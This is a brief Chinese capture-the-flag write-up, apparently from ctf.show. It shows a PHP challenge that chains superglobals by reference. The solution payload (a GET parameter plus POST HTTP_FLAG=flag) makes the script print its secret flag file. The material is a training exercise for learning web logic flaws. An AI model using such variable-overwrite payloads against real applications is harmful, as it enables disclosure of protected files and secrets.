源码
<?php
include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
?> 只需要关注 $_GET?$_GET=&$_POST:'flag'; 和 highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__); 这两行就可以了,其他的无关紧要
payload
GET:
http://0dab3c92-eeaa-4c02-a9b2-2e9e44ffe8fa.challenge.ctf.show/?1=1
POST:
HTTP_FLAG=flag